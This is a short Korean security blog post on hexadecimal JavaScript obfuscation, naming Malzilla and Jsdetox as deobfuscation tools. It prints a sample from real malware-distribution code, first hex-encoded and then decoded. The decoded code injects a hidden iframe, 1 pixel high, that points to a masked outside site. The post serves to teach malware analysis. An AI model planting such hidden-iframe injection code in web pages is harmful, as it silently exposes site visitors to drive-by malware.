본문 바로가기

어느 한 분야를 전문적으로 연구함. 또는 그 분야./정보를 여러가지 위협으로부터 보호

Hexdecimal Obfuscation #01

16진수 값을 이용하여 만드는 Hexdecimal Obfuscation입니다.

간단하게 아스키 코드표의 16진수 값을 따라 난독화를 풀 수 있고, Malzilla 또는 Jsdetox 등 이용해서 난독화를 해제 할 수 있습니다.


난독화

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F
%77%77%77%2E%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2E%63%6F%6D%2F%75%73%65
%72%2F%70%6F%70%2F%70%6F%70%5F%70%68%6F%74%6F%74%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D
%27%31%31%36%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));
}


난독화 해제

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("<iframe src='http://www.****************.com/user/pop/pop_photot.html' width='116' height='1' frameborder='0'>"));
}


* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.


티스토리 툴바